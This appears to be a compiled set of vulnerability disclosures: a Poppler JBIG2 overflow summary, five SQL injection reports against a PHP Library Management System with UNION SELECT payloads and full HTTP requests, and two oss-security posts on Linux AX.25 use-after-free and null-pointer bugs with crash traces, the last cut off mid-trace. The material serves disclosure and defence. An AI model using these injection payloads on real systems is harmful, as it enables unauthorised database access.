Poppler prior to and including 22.08.0 contains an integer overflow in the JBIG2 decoder (JBIG2Stream::readTextRegionSeg() in JBIGStream.cc). Processing a specially crafted PDF file or JBIG2 image could lead to a crash or the execution of arbitrary code. This is similar to the vulnerability described by CVE-2022-38171 in Xpdf.

CVE-2022-38784: Poppler

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /staff/studentdetails.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/staff/studentdetails.php?id=

Vulnerability location: /LMS/staff/studentdetails.php?id=, id

\[+\] Payload: /LMS/staff/studentdetails.php?id=-1002416%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /LMS/staff/studentdetails.php?id\=\-1002416%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close

CVE-2022-36712: bug_report/SQLi-4.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /staff/bookdetails.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/staff/bookdetails.php?id=

Vulnerability location: /LMS/staff/bookdetails.php?id=, id

\[+\] Payload: /LMS/staff/bookdetails.php?id=-191%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /LMS/staff/bookdetails.php?id\=\-191%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close

CVE-2022-36711: bug_report/SQLi-5.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the Section parameter at /librarian/lab.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/lab.php

Vulnerability location: /LMS/librarian/lab.php?Section=, Section

\[+\] Payload: submit=1&Section=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--%20&Status=1 // Leak place ---> Section

POST /LMS/librarian/lab.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
submit=1&Section=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--%20&Status=1

CVE-2022-36713: bug_report/SQLi-8.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the Section parameter at /staff/lab.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/staff/lab.php

Vulnerability location: /LMS/staff/lab.php?Section=, Section

\[+\] Payload: submit=1&Section=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--%20&Status=1 // Leak place ---> Section

POST /LMS/staff/lab.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
submit=1&Section=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--%20&Status=1

CVE-2022-36714: bug_report/SQLi-7.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /staff/edit_book_details.php.

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/staff/edit\_book\_details.php?id=

Vulnerability location: /LMS/staff/edit\_book\_details.php?id=, id

\[+\] Payload: /LMS/staff/edit\_book\_details.php?id=-191%27%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

GET /LMS/staff/edit\_book\_details.php?id\=\-191%27%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close

CVE-2022-36709: bug_report/SQLi-6.md at main · k0xx11/bug_report

A use-after-free flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 14:53:10 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1204: Linux kernel: UAF caused by binding operation when
 ax25 device is detaching

Hello there,

There are use-after-free vulnerabilities in net/ax25/af\_ax25.c of linux that allow 
attacker to crash linux kernel by simulating ax25 device from user space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The resources such as ax25\_dev and net\_device will be freed in ax25\_dev\_device\_down(),
if we call ax25\_bind() between ax25\_kill\_by\_device() and kfree() in ax25\_dev\_device\_down(),
we could use ax25\_dev in functions such as ax25\_bind() ax25\_release(), ax25\_connect(),
ax25\_ioctl(), ax25\_getname(), ax25\_sendmsg(), ax25\_getsockopt() and ax25\_info\_show() after
ax25\_dev has been deallocated, and use net\_device in functions such as ax25\_release(),
ax25\_sendmsg(), ax25\_getsockopt(), ax25\_getname() and ax25\_info\_show() after net\_device
has been deallocated.

One of the concurrency UAF related with ax25\_dev in ax25\_bind() can be shown as below:

       (USE)                  |     (FREE)
                              |  ax25\_device\_event
                              |    ax25\_dev\_device\_down
ax25\_bind                     |    ...
  ...                         |      kfree(ax25\_dev)
  ax25\_fillin\_cb()            |    ...
    ax25\_fillin\_cb\_from\_dev() |
  ...                         |

One of the concurrency UAF related with net\_device in ax25\_release() can be shown as below:

          (USE)                   |      (FREE)
                                  |  ax25\_kill\_by\_device()
    ax25\_bind()                   |
    ax25\_connect()                |    ...
                                  |  ax25\_dev\_device\_down()
                                  |    ...
                                  |    dev\_put\_track(dev, ...) //FREE
    ax25\_release()                |    ...
      ax25\_send\_control()         |
        alloc\_skb()      //USE    |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

(1) One of the use-after-free bug backtraces related with ax25\_dev is shown below.

\[  208.136725\] BUG: KASAN: use-after-free in ax25\_send\_control+0x3c/0x210
\[  208.136725\] Read of size 8 at addr ffff888007c4ad08 by task ax25\_co\_rel/3072
\[  208.136725\] Call Trace:
\[  208.136725\]  dump\_stack+0x7d/0xa3
\[  208.136725\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  kasan\_report.cold+0x7f/0x10e
\[  208.136725\]  ? \_raw\_write\_lock\_bh+0x80/0xd0
\[  208.136725\]  ? ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_send\_control+0x3c/0x210
\[  208.136725\]  ax25\_release+0x2db/0x3b0
\[  208.136725\]  \_\_sock\_release+0x6d/0x120
\[  208.136725\]  sock\_close+0xc/0x10
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  get\_signal+0xbae/0xc00
\[  208.136725\]  ? ax25\_connect+0x3c1/0x800
\[  208.136725\]  arch\_do\_signal\_or\_restart+0x1d9/0xc70
\[  208.136725\]  ? wait\_woken+0x110/0x110
\[  208.136725\]  ? selinux\_netlbl\_socket\_connect+0x26/0x30
\[  208.136725\]  ? kick\_process+0x12/0x80
\[  208.136725\]  ? task\_work\_add+0xcd/0xe0
\[  208.136725\]  ? restore\_sigcontext+0x320/0x320
\[  208.136725\]  ? \_\_sys\_connect+0x108/0x120
\[  208.136725\]  ? \_\_sys\_connect\_file+0xc0/0xc0
\[  208.136725\]  ? common\_nsleep+0x5a/0x70
\[  208.136725\]  ? copy\_init\_fpstate\_to\_fpregs+0x60/0x60
\[  208.136725\]  ? \_\_ia32\_sys\_clock\_adjtime+0x30/0x30
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0xaa/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] RIP: 0033:0x7fa754c17d2b
\[  208.136725\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 08 e8 31 fb ff ff 8b 44
\[  208.136725\] RSP: 002b:00007fa5dfd26ee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  208.136725\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fa754c17d2b
\[  208.136725\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  208.136725\] RBP: 00007fa5dfd26f00 R08: 0000000000000000 R09: 00007fa5dfd27700
\[  208.136725\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffc91618f7e
\[  208.136725\] R13: 00007ffc91618f7f R14: 00007fa5dfd26fc0 R15: 00007fa5dfd27700
\[  208.136725\] 
\[  208.136725\] Allocated by task 3070:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  \_\_\_\_kasan\_kmalloc.constprop.0+0x84/0xa0
\[  208.136725\]  ax25\_dev\_device\_up+0x27/0x1a0
\[  208.136725\]  ax25\_device\_event+0x12d/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  \_\_dev\_notify\_flags+0xbf/0x180
\[  208.136725\]  dev\_change\_flags+0x92/0xb0
\[  208.136725\]  devinet\_ioctl+0x92f/0xbd0
\[  208.136725\]  inet\_ioctl+0x259/0x290
\[  208.136725\]  sock\_do\_ioctl+0xa8/0x1e0
\[  208.136725\]  sock\_ioctl+0x2ee/0x3f0
\[  208.136725\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  208.136725\]  do\_syscall\_64+0x33/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.136725\] 
\[  208.136725\] Freed by task 3071:
\[  208.136725\]  kasan\_save\_stack+0x1b/0x40
\[  208.136725\]  kasan\_set\_track+0x1c/0x30
\[  208.136725\]  kasan\_set\_free\_info+0x20/0x30
\[  208.136725\]  \_\_\_\_kasan\_slab\_free+0xec/0x120
\[  208.136725\]  kfree+0x8f/0x210
\[  208.136725\]  ax25\_device\_event+0x14e/0x160
\[  208.136725\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.136725\]  dev\_close\_many+0x17d/0x230
\[  208.136725\]  rollback\_registered\_many+0x1f1/0x950
\[  208.136725\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.136725\]  unregister\_netdev+0x13/0x20
\[  208.136725\]  mkiss\_close+0xc4/0x120
\[  208.136725\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.136725\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.136725\]  tty\_release+0x200/0x670
\[  208.136725\]  \_\_fput+0x104/0x3b0
\[  208.136725\]  task\_work\_run+0x8f/0xd0
\[  208.136725\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.136725\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.136725\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

(2) One of the use-after-free bug backtraces related with net\_device is shown below.

\[  769.959339\] BUG: KASAN: use-after-free in ax25\_send\_control+0x43/0x210
\[  769.959339\] Read of size 2 at addr ffff8880092520de by task ax25\_co\_rel/1970
\[  769.966904\] Call Trace:
\[  769.966904\]  <TASK>
\[  769.966904\]  dump\_stack\_lvl+0x57/0x7d
\[  769.966904\]  print\_address\_description.constprop.0+0x1f/0x150
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  kasan\_report.cold+0x7f/0x11b
\[  769.966904\]  ? ax25\_send\_control+0x43/0x210
\[  769.966904\]  ax25\_send\_control+0x43/0x210
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ax25\_release+0x2db/0x3b0
\[  769.966904\]  ? lock\_release+0xb2/0x470
\[  769.966904\]  \_\_sock\_release+0x6d/0x120
\[  769.966904\]  sock\_close+0xf/0x20
\[  769.966904\]  \_\_fput+0x11f/0x420
\[  769.966904\]  task\_work\_run+0x86/0xd0
\[  769.966904\]  get\_signal+0x1096/0x1240
\[  769.966904\]  ? lockdep\_hardirqs\_on\_prepare+0xe/0x230
\[  769.966904\]  ? \_\_local\_bh\_enable\_ip+0x7e/0xf0
\[  769.966904\]  ? trace\_hardirqs\_on+0x1c/0x110
\[  769.966904\]  ? ax25\_connect+0x3c1/0x800
\[  769.966904\]  ? signal\_setup\_done+0x2a0/0x2a0
\[  769.966904\]  arch\_do\_signal\_or\_restart+0x1df/0xbf0
\[  770.012784\]  exit\_to\_user\_mode\_prepare+0x143/0x1c0
\[  770.012784\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.012784\]  do\_syscall\_64+0x48/0x90
\[  770.012784\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.012784\] RIP: 0033:0x7fba03510d2b
\[  770.012784\] Code: 83 ec 18 89 54 24 0c 48 89 34 24 89 7c 24 08 e8 fb fa ff ff 8b 54 24 0c 48 8b 34 24 41 89 c0 8b 7c 24 08 b8 2a 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44
\[  770.016580\] RSP: 002b:00007fb9a9f5aee0 EFLAGS: 00000293 ORIG\_RAX: 000000000000002a
\[  770.016580\] RAX: fffffffffffffe00 RBX: 0000000000000000 RCX: 00007fba03510d2b
\[  770.021380\] RDX: 0000000000000010 RSI: 00000000006021c0 RDI: 0000000000000005
\[  770.021380\] RBP: 00007fb9a9f5af00 R08: 0000000000000000 R09: 00007fb9a9f5b700
\[  770.021380\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffeb426b5ce
\[  770.021380\] R13: 00007ffeb426b5cf R14: 00007fb9a9f5afc0 R15: 00007fb9a9f5b700
\[  770.021380\]  </TASK>
\[  770.021380\] 
\[  770.021380\] Allocated by task 1283:
\[  770.025691\]  kasan\_save\_stack+0x1e/0x40
\[  770.025691\]  \_\_kasan\_kmalloc+0x81/0xa0
\[  770.025691\]  alloc\_netdev\_mqs+0x5a/0x680
\[  770.025691\]  mkiss\_open+0x6c/0x380
\[  770.025691\]  tty\_ldisc\_open+0x55/0x90
\[  770.029456\]  tty\_set\_ldisc+0x193/0x2e0
\[  770.029456\]  tty\_ioctl+0x4ae/0xc70
\[  770.029456\]  \_\_x64\_sys\_ioctl+0xb4/0xf0
\[  770.029456\]  do\_syscall\_64+0x3b/0x90
\[  770.029456\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae
\[  770.029456\] 
\[  770.033625\] Freed by task 1969:
\[  770.033625\]  kasan\_save\_stack+0x1e/0x40
\[  770.033625\]  kasan\_set\_track+0x21/0x30
\[  770.033625\]  kasan\_set\_free\_info+0x20/0x30
\[  770.033625\]  \_\_kasan\_slab\_free+0xfa/0x130
\[  770.033625\]  kfree+0xa3/0x2c0
\[  770.033625\]  device\_release+0x54/0xe0
\[  770.037210\]  kobject\_put+0xa5/0x120
\[  770.037210\]  tty\_ldisc\_kill+0x3e/0x80
\[  770.037210\]  tty\_ldisc\_hangup+0x1b2/0x2c0
\[  770.037210\]  \_\_tty\_hangup.part.0+0x316/0x520
\[  770.037210\]  tty\_release+0x200/0x670
\[  770.037210\]  \_\_fput+0x11f/0x420
\[  770.037210\]  task\_work\_run+0x86/0xd0
\[  770.037210\]  exit\_to\_user\_mode\_prepare+0x1b2/0x1c0
\[  770.037210\]  syscall\_exit\_to\_user\_mode+0x19/0x50
\[  770.041472\]  do\_syscall\_64+0x48/0x90
\[  770.041472\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xae

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Reproduce  =\*=\*=\*=\*=\*=\*=\*=\*=

We could use pseudoterminal-based device emulation to simulate
ax25 device from user space and create a socket for it. Then, 
we create four threads: the first thread is used to initialize 
and start ax25 device, the second thread is used to close the
pseudoterminal-based device, the third thread is used to execute
bind and connect syscalls, the last thread is used to close the 
socket. Let these four threads to interleave, we could reproduce
the bug. 

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/d01ffb9eee4af165d83b08dd73ebdf9fe94a519b
https://github.com/torvalds/linux/commit/87563a043cef044fed5db7967a75741cc16ad2b1
https://github.com/torvalds/linux/commit/feef318c855a361a1eccd880f33e88c460eb63b4
https://github.com/torvalds/linux/commit/9fd75b66b8f68498454d685dc4ba13192ae069b0
https://github.com/torvalds/linux/commit/5352a761308397a0e6250fdc629bb3f615b94747

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-01-28: commit d01ffb9eee4a accepted to mainline kernel
2022-02-04: commit 87563a043cef accepted to mainline kernel
2022-01-28: commit feef318c855a accepted to mainline kernel
2022-03-21: commit 9fd75b66b8f6 accepted to mainline kernel
2022-03-29: commit 5352a7613083 accepted to mainline kernel
2022-04-02: CVE-2022-1204 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=
Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1204: security - CVE-2022-1204: Linux kernel: UAF caused by binding operation when ax25 device is detaching

A flaw was found in the Linux kernel. This flaw allows an attacker to crash the Linux kernel by simulating amateur radio from the user space, resulting in a null-ptr-deref vulnerability and a use-after-free vulnerability.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sat, 2 Apr 2022 16:45:07 +0800 (GMT+08:00)
From: 周多明 <duoming@....edu.cn>
To: oss-security@...ts.openwall.com
Subject: CVE-2022-1199 kernel: Null pointer dereference and use-after-free
 in ax25\_release()

Hello there,

There are null-ptr-deref vulnerability and use-after-free vulnerabilities in net/ax25/af\_ax25.c
of linux that allow attacker to crash linux kernel by simulating ax25 device from user-space.

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Details  =\*=\*=\*=\*=\*=\*=\*=\*=

The null-ptr-deref vulnerability is caused by "ax25->sk = NULL" in ax25\_release(). 
The dereference sites include "bh\_lock\_sock(ax25->sk)" and "bh\_unlock\_sock(ax25->sk)"
in ax25\_disconnect(), "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device(). 

The NPD bug related with bh\_lock\_sock(ax25->sk) is shown below:

ax25\_kill\_by\_device()                | ax25\_release()
  ax25\_disconnect()                  |   ax25\_destroy\_socket()
    ...                              |
    if(ax25->sk != NULL)             |     ...
      ...                            |     ax25->sk = NULL;
      bh\_lock\_sock(ax25->sk); //(1)  |     ...
      ...                            |
      bh\_unlock\_sock(ax25->sk); //(2)|

The NPD bug related with lock\_sock(s->sk) is shown below:

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
                             |     ax25\_cb\_del()
  ...                        |     ...
                             |     ax25->sk=NULL;
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |     ...
  release\_sock(s->sk); //(2) |
  ...                        |

The use-after-free vulnerability is caused by "sock\_put(sk)" in ax25\_release(). The dereference 
sites include "lock\_sock(s->sk)" and "release\_sock(s->sk)" in ax25\_kill\_by\_device().

ax25\_kill\_by\_device()        | ax25\_release()
                             |   ax25\_destroy\_socket()
  ...                        |   ...
                             |   sock\_put(sk); //FREE
  lock\_sock(s->sk); //(1)    |
  s->ax25\_dev = NULL;        |   ...
  release\_sock(s->sk); //(2) |
  ...                        |

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Effects  =\*=\*=\*=\*=\*=\*=\*=\*=

We can successfully trigger the vulnerabilities to crash the linux kernel.

The NPD bug related with bh\_lock\_sock() is shown below.

\[  178.776298\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  178.777929\] RIP: 0010:\_raw\_spin\_lock+0x7e/0xd0
\[  178.777929\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 2a 29 e8 fe be 04 00 00 00 48 8d 7c 24 20 e8 1b 29 e8 fe ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  178.777929\] RSP: 0018:ffff888007dcfa48 EFLAGS: 00000297
\[  178.777929\] RAX: 0000000000000000 RBX: 1ffff11000fb9f49 RCX: ffffffff82482855
\[  178.777929\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff888007dcfa68
\[  178.777929\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  178.777929\] R10: ffffed1000fb9f4d R11: 0000000000000001 R12: 0000000000000065
\[  178.777929\] R13: ffff888009f99800 R14: ffff888009f99860 R15: ffff888009f99800
\[  178.777929\] FS:  00007f9651ce3700(0000) GS:ffff88806d480000(0000) knlGS:0000000000000000
\[  178.777929\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  178.777929\] CR2: 0000000000000088 CR3: 0000000009876000 CR4: 00000000000006e0
\[  178.777929\] Call Trace:
\[  178.777929\]  ? \_raw\_read\_lock\_irq+0x30/0x30
\[  178.777929\]  ? \_raw\_spin\_unlock\_bh+0x9/0x20
\[  178.777929\]  ? ax25\_link\_failed+0x40/0x60
\[  178.777929\]  ax25\_disconnect+0xf6/0x220
\[  178.777929\]  ax25\_device\_event+0x187/0x250
\[  178.777929\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  178.777929\]  dev\_close\_many+0x17d/0x230
\[  178.777929\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  178.777929\]  rollback\_registered\_many+0x1f1/0x950
\[  178.777929\]  ? \_raw\_write\_lock\_irqsave+0xd0/0xd0
\[  178.777929\]  ? dev\_alloc\_name+0xd0/0xd0
\[  178.777929\]  ? ldsem\_down\_read+0x410/0x410
\[  178.777929\]  unregister\_netdevice\_queue+0x133/0x200
\[  178.777929\]  ? unregister\_netdevice\_many+0x20/0x20
\[  178.777929\]  ? sixpack\_close+0xf8/0x130
\[  178.777929\]  unregister\_netdev+0x13/0x20
\[  178.777929\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  178.777929\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  178.777929\]  tty\_release+0x200/0x670
\[  178.777929\]  \_\_fput+0x104/0x3b0
\[  178.777929\]  task\_work\_run+0x8f/0xd0
\[  178.777929\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  178.777929\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  178.777929\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9

The NPD bug related with lock\_sock() is shown below.

\[  727.493561\] BUG: kernel NULL pointer dereference, address: 0000000000000088
\[  727.493561\] RIP: 0010:\_raw\_spin\_lock\_bh+0x89/0xd0
\[  727.493561\] Code: be 04 00 00 00 c7 44 24 20 00 00 00 00 e8 5f c6 f1 fd be 04 00 00 00 48 8d 7c 24 20 e8 50 c6 f1 fd ba 01 00 00 00 8b 44 24 20 <f0> 0f b1 55 00 75 29 48 b8 00 00 00 00
\[  727.493561\] RSP: 0018:ffff88801569f9c0 EFLAGS: 00000297
\[  727.493561\] RAX: 0000000000000000 RBX: 1ffff11002ad3f38 RCX: ffffffff8366d960
\[  727.493561\] RDX: 0000000000000001 RSI: 0000000000000004 RDI: ffff88801569f9e0
\[  727.493561\] RBP: 0000000000000088 R08: 0000000000000001 R09: 0000000000000003
\[  727.493561\] R10: ffffed1002ad3f3c R11: 0000000000000001 R12: 0000000000000088
\[  727.493561\] R13: ffff888016166700 R14: ffff888014a57dc8 R15: dffffc0000000000
\[  727.493561\] FS:  00007f5cab712700(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
\[  727.493561\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[  727.493561\] CR2: 0000000000000088 CR3: 000000000a336000 CR4: 00000000000006f0
\[  727.493561\] Call Trace:
\[  727.493561\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  727.493561\]  release\_sock+0x16/0x170
\[  727.493561\]  ax25\_device\_event+0x1a3/0x270
\[  727.493561\]  ? nr\_device\_event+0xf2/0x140
\[  727.493561\]  raw\_notifier\_call\_chain+0x8d/0xd0
\[  727.493561\]  dev\_close\_many+0x227/0x400
\[  727.493561\]  ? \_\_dev\_close\_many+0x290/0x290
\[  727.493561\]  ? finish\_task\_switch.isra.0+0x205/0x620
\[  727.493561\]  ? \_\_switch\_to+0x572/0xe50
